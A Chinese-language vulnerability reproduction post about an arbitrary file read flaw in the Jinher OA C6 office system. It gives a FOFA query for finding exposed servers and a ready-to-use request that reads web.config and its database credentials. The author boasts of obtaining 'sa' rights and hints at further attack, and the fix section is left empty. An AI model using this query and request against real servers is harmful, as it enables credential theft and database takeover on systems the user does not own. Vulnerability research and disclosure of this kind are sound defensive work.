【漏洞复现】金和OA C6任意文件读取漏洞

漏洞描述

金和OA协同办公管理系统C6软件共有20多个应用模块，160多个应用子模块，涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围，从功能型的协同办公平台上升到管理型协同管理平台，并不断地更新完善，全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。

该OA C6系统的download.jsp文件存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器的敏感信息。

免责声明

技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！

资产确定

fofa：app=“金和网络-金和OA”

漏洞复现

1.执行POC即可获取Web.config文件内容，其中包含数据库账号密码。

http://IP/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
1

拿到了sa权限，剩下的不用我说了，大家都懂

修复方案